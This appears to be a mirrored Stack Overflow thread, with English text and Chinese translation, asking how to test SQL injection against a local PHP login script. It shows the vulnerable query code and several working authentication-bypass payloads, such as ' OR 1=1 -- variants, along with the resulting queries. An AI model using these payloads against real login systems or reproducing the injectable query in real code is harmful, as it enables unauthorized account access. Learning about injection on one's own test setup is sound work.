安全性PHP登录SQL注入
[英]Security PHP login SQL injection
问题描述
I want to try on my localhost SQL injection on this login script. 
我想在此登录脚本上尝试localhost SQL注入。 But I dont know how. 但是我不知道如何。 Database have three column id , nameUser , passwordUser . 数据库具有三个列id : nameUser , passwordUser 。 Or I need create some other script, which is unsecure for injection. 或者我需要创建其他脚本,该脚本对于注入是不安全的。
Thanks for your advice. 谢谢你的建议。
if(isset($_POST['sent'])) {
$nameUser = $_POST["name_User"];
$passwordUser = $_POST["password_User"];
$heslo = hash('sha512', $passwordUser);
$dotaz = $spojeni->query("select * from uzivatele where nameUser = '$nameUser' and passwordUser = '$heslo'");
$result = mysqli_num_rows($dotaz);
$row = mysqli_fetch_array($dotaz);
if ($result == 1) {
echo "You are log in";
die();
} else {
echo "badlogin";
exit();
} }
3 个解决方案
解决方案1
1 2017-02-05 13:07:51
To sign in as john (assuming it's a valid user) you can convert this: 要以john (假设它是有效用户)身份登录,您可以进行以下转换:
select * from uzivatele where nameUser = '$nameUser' and passwordUser = '$heslo
^^^^^^^^^
... into this: ...变成这样:
select * from uzivatele where nameUser = 'john' -- ' and passwordUser = '$heslo'
^^^^^^^^^
... by setting $_POST["name_User"] equal to the underlined code. ...设置$_POST["name_User"]等于带下划线的代码。 The password condition is completely ignored because it's now inside a comment. 密码条件被完全忽略,因为它现在在注释中。
If you don't want to impersonate someone but just sign in with any random user, you only need to ensure that the final query returns exactly one row, eg: 如果您不想假冒他人,而只是使用任何随机用户登录,则只需确保最终查询返回的行恰好为一行,例如:
select * from uzivatele where nameUser = '' OR 1=1 LIMIT 1 -- ' and passwordUser = '$heslo'
^^^^^^^^^^^^^^^^^^^^
解决方案2
0 2017-02-05 12:24:57
' or '1'='1
If above is entered as username and password this will do what you are trying to achieve. 如果输入以上作为用户名和密码,这将达到您想要实现的目的。
So query will get modified like: 因此查询将被修改为:
SELECT * FROM uzivatele WHERE nameUser='' or '1'='1' AND passwordUser='' or '1'='1';
Its looking for each to be true, as 1 will always equal 1. 它寻找每个都是真实的,因为1将始终等于1。
解决方案3
0 2017-02-05 13:06:34
NOTE: 注意:
I try everything ' OR 1=1 ' OR id = 1--...but dont work.
In your question you are using both Procedural and Object Orientated PHP MySQL interactions, which will not work and will give you various script errors. 在您的问题中,您同时使用了过程式和面向对象的 PHP MySQL交互,这将不起作用,并且会给您各种脚本错误。 You need to use one or the other, these two things do not interact with each other! 您需要使用其中之一,这两种东西不会互相影响!
My Answer 我的答案
Strings in MySQL are encased in single quotes so you need to close off the string early, and then add any MySQL command you want to on the end before finally tidying up so you do not cause a syntax error in the original SQL statement (although from an injection point of view syntax errors can be beneficial in seeing just how vulnerable SQL queries are, as people with these vulnerbilities often output their errors to screen rather than log files, etc.): MySQL中的字符串用单引号引起来,因此您需要及早关闭字符串,然后在最终整理之前添加最后要添加的任何MySQL命令,这样就不会在原始SQL语句中引起语法错误(尽管注入角度语法错误可能有助于了解SQL查询的脆弱性,因为具有这些漏洞的人通常将错误输出到屏幕而不是日志文件等):
part 1: 第1部分:
Close the input string early; 尽早关闭输入字符串; x'
Part 2: 第2部分:
carry on the SQL statement adding your own instructions but not causing a Syntax error (part 3). 继续执行添加自己的指令但不会引起语法错误的SQL语句(第3部分)。
Typically using numbers: OR 1=1 (will always be true) 通常使用数字: OR 1=1 (始终为true)
Part 3 preventing a syntax error. 第3部分,防止语法错误。
-- or # (start comment) or appending the SQL so that the full SQL query is syntactically correct (injection string finishes with an open string): nameUser = 'z --或# (开始注释)或附加SQL,以便完整的SQL查询在语法上正确(注入字符串以开放字符串结尾): nameUser = 'z
So your input username string can now be: 因此,您输入的用户名字符串现在可以是:
x' OR 1=1 OR nameUser='z
giving your SQL: 给你的SQL:
select * from uzivatele where nameUser = 'x' OR 1=1 OR nameUser='z'
and passwordUser = ''
Or alternatively using comments: 或者使用注释:
x' OR 1=1 --
select * from uzivatele where nameUser = 'x' OR 1=1 -- ' and passwordUser = ''
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.